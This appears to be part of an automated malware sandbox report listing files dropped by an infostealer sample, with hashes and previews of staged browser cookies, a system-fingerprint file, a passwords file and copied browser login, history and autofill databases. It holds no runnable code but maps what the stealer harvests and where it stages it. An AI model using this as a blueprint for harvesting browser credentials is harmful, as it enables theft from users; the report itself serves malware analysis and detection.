                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\adobe9NcUyPNf3YG5\Cookies\Chrome_Default.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):530
                                                                                                                                                                                  Entropy (8bit):6.005544722730675
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:c7F2v4kMx/6UsMbf4/LJPhvkRj6a9kuEYTCRopYxOOVtouEYv:SCJyHXbfQJPh8RdkYiFoYv
                                                                                                                                                                                  MD5:987FB1A1830B0EB5C0D306F8A2DE9981
                                                                                                                                                                                  SHA1:8374E6320AD99C3FF177A9889F1AB75448F6EB19
                                                                                                                                                                                  SHA-256:5EF24A6CE57CA3048431555909EC23CD5494DA76845F84271946442249DDA891
                                                                                                                                                                                  SHA-512:9E2A48264084B79051FC275DD7780A5552B56220459A1CDDBE6F6A307FE0E5759AE20BC243D085D9734153879AC4E66233AB83F92551DD8092EABF85B16F2D15
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.google.com.TRUE./.TRUE.1712298002.NID.ENC893*_djEwx6CLkXLg8AuSZWCgylmAsMNnd1LSfbcL+IfCgMvX/m5IrzdSwxt6X6n5S6C7wCoUoWvuixZpzrMizGZc5ohIpmsvlOrGTOhFkQ4+lCF6fVH0QNPBBb27o2nXM8em7EAYS1bYZC2LV04SqpgyxJmdfFA7UyWUoK8kFZQDRl0vdOzWdvAoumw2skuCCtJC2oG3z3OYbLTLDbM7wYvVmfDeqtnZRihAAt+ptqI6cfY1a+KO9XP+4XkDSXW7JhsexYHBqzSSBmUisGZ7f9E=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*...google.com.FALSE./.TRUE.1699078840.1P_JAR.ENC893*_djEwZKzV9KAslchfQWnVTck71JHMVRC24lvAWgdl5WpYIXlINsbQSVWzkKU=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\adobe9NcUyPNf3YG5\information.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5515
                                                                                                                                                                                  Entropy (8bit):5.470891480948761
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:xe+J9GZbRT4cBC1IUlzhgW7ANikYlO4LTRHPTYIehHT4HkXGR035iZtcdaE64nvn:xZXKx484IUlzhtENikYlO4LTRHPTYIe7
                                                                                                                                                                                  MD5:7A06AB13FD459CABA736CC2841BE5C41
                                                                                                                                                                                  SHA1:FBB10CE0A7783FEB40BAD140BF88E5166E2986DF
                                                                                                                                                                                  SHA-256:051DA60FAF5B67CE6A03E3CB2343D8A0F20D6455D549EC6CC8D174D07504930A
                                                                                                                                                                                  SHA-512:60D64B5D44C5BDA36CF2E798886F187F9B081079A33941FA24B351FBAD2454A8EA0A03B32526FEFE89667CC226D9484BF9F2AC624C5896DB504B91AF221218ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Build: macho..Version: 1.5....Date: Wed Feb 21 12:29:14 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 546cce35671424c74dd4f154cce32ed2....Path: C:\Users\user\Desktop\I2jCDr35mu.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobe9NcUyPNf3YG5....IP: 191.96.227.222..Location: US, New York City..Windows: Windows 10 Pro [x64]..Computer Name: 571345..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 21/2/2024 12:29:14..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [328]..csrss.exe [412]..wininit.exe [488]..csrss.exe [496]..winlogon.exe [560]..services.exe [632]..lsass.exe [652]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe [788]..svchost.exe

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\adobe9NcUyPNf3YG5\passwords.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4897
                                                                                                                                                                                  Entropy (8bit):2.518316437186352
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                                                                  MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                                                                  SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                                                                  SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                                                                  SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\adobeMl1n683teX9h\Cookies\Chrome_Default.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):530
                                                                                                                                                                                  Entropy (8bit):6.005544722730675
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:c7F2v4kMx/6UsMbf4/LJPhvkRj6a9kuEYTCRopYxOOVtouEYv:SCJyHXbfQJPh8RdkYiFoYv
                                                                                                                                                                                  MD5:987FB1A1830B0EB5C0D306F8A2DE9981
                                                                                                                                                                                  SHA1:8374E6320AD99C3FF177A9889F1AB75448F6EB19
                                                                                                                                                                                  SHA-256:5EF24A6CE57CA3048431555909EC23CD5494DA76845F84271946442249DDA891
                                                                                                                                                                                  SHA-512:9E2A48264084B79051FC275DD7780A5552B56220459A1CDDBE6F6A307FE0E5759AE20BC243D085D9734153879AC4E66233AB83F92551DD8092EABF85B16F2D15
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.google.com.TRUE./.TRUE.1712298002.NID.ENC893*_djEwx6CLkXLg8AuSZWCgylmAsMNnd1LSfbcL+IfCgMvX/m5IrzdSwxt6X6n5S6C7wCoUoWvuixZpzrMizGZc5ohIpmsvlOrGTOhFkQ4+lCF6fVH0QNPBBb27o2nXM8em7EAYS1bYZC2LV04SqpgyxJmdfFA7UyWUoK8kFZQDRl0vdOzWdvAoumw2skuCCtJC2oG3z3OYbLTLDbM7wYvVmfDeqtnZRihAAt+ptqI6cfY1a+KO9XP+4XkDSXW7JhsexYHBqzSSBmUisGZ7f9E=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*...google.com.FALSE./.TRUE.1699078840.1P_JAR.ENC893*_djEwZKzV9KAslchfQWnVTck71JHMVRC24lvAWgdl5WpYIXlINsbQSVWzkKU=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\adobeMl1n683teX9h\information.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5564
                                                                                                                                                                                  Entropy (8bit):5.47879047715366
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:xe+CmnbRThcBC1IUlzhgW7ANikYlO4LTRHPTYIehHT4HkXGR035iZtcdaE64nvV2:xZlxh84IUlzhtENikYlO4LTRHPTYIehu
                                                                                                                                                                                  MD5:C708A4BCBB119536A5C65ACDCE7BC6A2
                                                                                                                                                                                  SHA1:29E792E92BD11D869522EFCE797A2C316A3AC533
                                                                                                                                                                                  SHA-256:E474E8B5E67AC38CAE7B7C1FC3AC5F48FA65F7727B7B8894337222FC32EACDBF
                                                                                                                                                                                  SHA-512:44CBFB2E2AC9466C667D0586C67B14AC2AB246CED55680AA42606C2ACBAC7FD7ACD652622C65BE6F22942E70021F347ED8DF3CE8EDA749A2945B2F260ED97ABE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Build: macho..Version: 1.5....Date: Wed Feb 21 12:29:19 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 546cce35671424c74dd4f154cce32ed2....Path: C:\ProgramData\MPGPH131\MPGPH131.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobeMl1n683teX9h....IP: 191.96.227.222..Location: US, New York City..Windows: Windows 10 Pro [x64]..Computer Name: 571345..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 21/2/2024 12:29:19..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [328]..csrss.exe [412]..wininit.exe [488]..csrss.exe [496]..winlogon.exe [560]..services.exe [632]..lsass.exe [652]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe [788]..svchost.exe [868

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\adobeMl1n683teX9h\passwords.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4897
                                                                                                                                                                                  Entropy (8bit):2.518316437186352
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                                                                  MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                                                                  SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                                                                  SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                                                                  SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\adobebBzuPduPgFBl\Cookies\Chrome_Default.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):530
                                                                                                                                                                                  Entropy (8bit):6.005544722730675
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:c7F2v4kMx/6UsMbf4/LJPhvkRj6a9kuEYTCRopYxOOVtouEYv:SCJyHXbfQJPh8RdkYiFoYv
                                                                                                                                                                                  MD5:987FB1A1830B0EB5C0D306F8A2DE9981
                                                                                                                                                                                  SHA1:8374E6320AD99C3FF177A9889F1AB75448F6EB19
                                                                                                                                                                                  SHA-256:5EF24A6CE57CA3048431555909EC23CD5494DA76845F84271946442249DDA891
                                                                                                                                                                                  SHA-512:9E2A48264084B79051FC275DD7780A5552B56220459A1CDDBE6F6A307FE0E5759AE20BC243D085D9734153879AC4E66233AB83F92551DD8092EABF85B16F2D15
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.google.com.TRUE./.TRUE.1712298002.NID.ENC893*_djEwx6CLkXLg8AuSZWCgylmAsMNnd1LSfbcL+IfCgMvX/m5IrzdSwxt6X6n5S6C7wCoUoWvuixZpzrMizGZc5ohIpmsvlOrGTOhFkQ4+lCF6fVH0QNPBBb27o2nXM8em7EAYS1bYZC2LV04SqpgyxJmdfFA7UyWUoK8kFZQDRl0vdOzWdvAoumw2skuCCtJC2oG3z3OYbLTLDbM7wYvVmfDeqtnZRihAAt+ptqI6cfY1a+KO9XP+4XkDSXW7JhsexYHBqzSSBmUisGZ7f9E=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*...google.com.FALSE./.TRUE.1699078840.1P_JAR.ENC893*_djEwZKzV9KAslchfQWnVTck71JHMVRC24lvAWgdl5WpYIXlINsbQSVWzkKU=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\adobebBzuPduPgFBl\information.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5531
                                                                                                                                                                                  Entropy (8bit):5.476149468910779
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:xe+4SbRTLLcBC1IUlzhgW7ANikYlO4LTRHPTYIehHT4HkXGR035iZtcdaE64nvVr:xZjxLL84IUlzhtENikYlO4LTRHPTYIeF
                                                                                                                                                                                  MD5:042A6C11E902E02D15A230A213FA7E25
                                                                                                                                                                                  SHA1:51727735AD5FB6D314A109E1D17E0B5DD404A81E
                                                                                                                                                                                  SHA-256:518DA8E816014BAEAEA4D0DA47DFCE983CA9EE5AA0DCAEBC81F0A8438527A17F
                                                                                                                                                                                  SHA-512:FCAF46F0C74B071748CAA44BB8BAEE95B6176E22A28E7E9BB83CD271FA2206AEE34B561D115AA22E3E33F6C065A3D97C9ED57CCBEF58B6CE59344E8B470ECEFD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Build: macho..Version: 1.5....Date: Wed Feb 21 12:29:17 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 546cce35671424c74dd4f154cce32ed2....Path: C:\ProgramData\MPGPH131\MPGPH131.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobebBzuPduPgFBl....IP: 191.96.227.222..Location: US, New York City..Windows: Windows 10 Pro [x64]..Computer Name: 571345..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 21/2/2024 12:29:17..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [328]..csrss.exe [412]..wininit.exe [488]..csrss.exe [496]..winlogon.exe [560]..services.exe [632]..lsass.exe [652]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe [788]..svchost.exe [868

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\adobebBzuPduPgFBl\passwords.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4897
                                                                                                                                                                                  Entropy (8bit):2.518316437186352
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                                                                  MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                                                                  SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                                                                  SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                                                                  SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\f2df072a-550b-49a9-8a71-da45dd0e03a9.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):98996
                                                                                                                                                                                  Entropy (8bit):7.702003651641397
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:+cQXinoKQoMGurcwFy3iTpv6zM39m3FPS:+cEUoKnfLvCCzM39m3FPS
                                                                                                                                                                                  MD5:34F93FE5B54D7C652360BA28D94F8E66
                                                                                                                                                                                  SHA1:31901469EADAD58B8BF99BBD9698E60ACDD7ABED
                                                                                                                                                                                  SHA-256:10DC1ED2D8D9D4DB369DDF7FD6F53EFFC9BFD87F46AFDFC6C86CB637D2067A38
                                                                                                                                                                                  SHA-512:9B86ACC2F5B92A75BD3028352F03DA10C6424C3514A3372A32EA8F60E79770D8B5AC5DBE0B45DD54B804C6EC79E1A1DBD887D0DF333DD253238DC30E6C5A1000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Cr24....f"........0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........;:[........o$..#Cb.G+.T.hI.9...M.J..u.:....13S..*...%...)Rd.rROmI#z_..sO6@...'/'..... \....5}k..R..2..22..?E.......r;E..Z...C.^.J...=.E.m..hb%{DiYnrD....T.....B.`Z..OCQf...."..P..7.W...D....}.E7P...uf........A.....s.L.!.......!.9..J..c\Ac\5.....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. Z.......o...$k.Sz.i...9D..K.$.. -=C.}.b...P....;.._"...u..s2#..c".>...........|[..:.._...9...O2o.A`.D......D....4..t...euGOL..~...:.:....^...?..C6...8.....?~..M............?..c#.R.........SyU.R..7..L...6r.mk.U.u....X..Wa.o...".o..l...(.5.....t..o......Y..1Q...me....K.....{.~N=8_.:."G.....qq5...^.~....s'.4...re.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\02zdBXl47cvzHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\02zdBXl47cvzcookies.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\2jQJv37iJ0lzCookies

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\3b6N2Xdh3CYwWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\3b6N2Xdh3CYwplaces.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\8ghN89CsjOW1Login Data For Account

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
